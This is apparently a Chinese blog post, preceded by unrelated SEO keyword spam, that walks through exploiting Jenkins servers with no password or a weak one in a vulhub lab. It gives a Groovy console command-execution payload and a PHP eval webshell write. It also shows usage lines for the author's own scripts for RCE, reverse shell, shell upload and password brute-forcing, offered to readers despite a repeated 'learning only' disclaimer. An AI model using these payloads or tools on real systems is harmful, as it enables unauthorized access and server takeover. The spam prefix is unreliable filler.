免费行情软件网站直播,nginx搭建wordpress,批量上传 wordpress,省建设厅执业资格注册中心网站一、漏洞简介#xff1a; Jenkins是一个功能强大的应用程序#xff0c;允许持续集成和持续交付项目#xff0c;无论用的是什么平台。这是一个免费的源代码#xff0c;可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续… 一、漏洞简介 Jenkins是一个功能强大的应用程序允许持续集成和持续交付项目无论用的是什么平台。这是一个免费的源代码可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 漏洞原因jenkins 未设置帐号密码或者使用了弱帐号密码 二、漏洞复现 访问target/manage如果有未授权的话就直接可以进入如下界面如果没有尝试弱口令猜解我这里用的是vulhub搭建的账号密码admin / admin 1、执行命令并回显 println id.execute().text 执行结果 2、上传shell文件 new File(/var/www/shell.php).write(?php eval($_POST[cmd]);?); 由于这里没有其他环境就演示写到tmp目录下 shell.php被成功上传 三、自动化EXP(自写) 一、自动化执行命令脚本 支持三个功能需要手动修改conf.py配置文件 1、RCE python3 Jenkins_Exec.py http://192.168.136.131:8080 -f rce 2、反弹shell python3 Jenkins_Exec.py http://192.168.136.131:8080 -f r_shell 成功反弹shell 3、上传shell python3 Jenkins_Exec.py http://192.168.136.131:8080 -f shell -s shell.php 二、弱口令爆破脚本 使用实例 python3 jenkins_burte.py http://192.168.136.131:8080 -u pass.txt -p pass.txt -t 10 脚本已经打包好了需要的看官后台留言jenkins exp链接有效期为7天请注意保存请仅用于学习研究 注意脚本仅作为学习和讨论使用禁止利用其进行任何违法行为与作者无关 注意脚本仅作为学习和讨论使用禁止利用其进行任何违法行为与作者无关 注意脚本仅作为学习和讨论使用禁止利用其进行任何违法行为与作者无关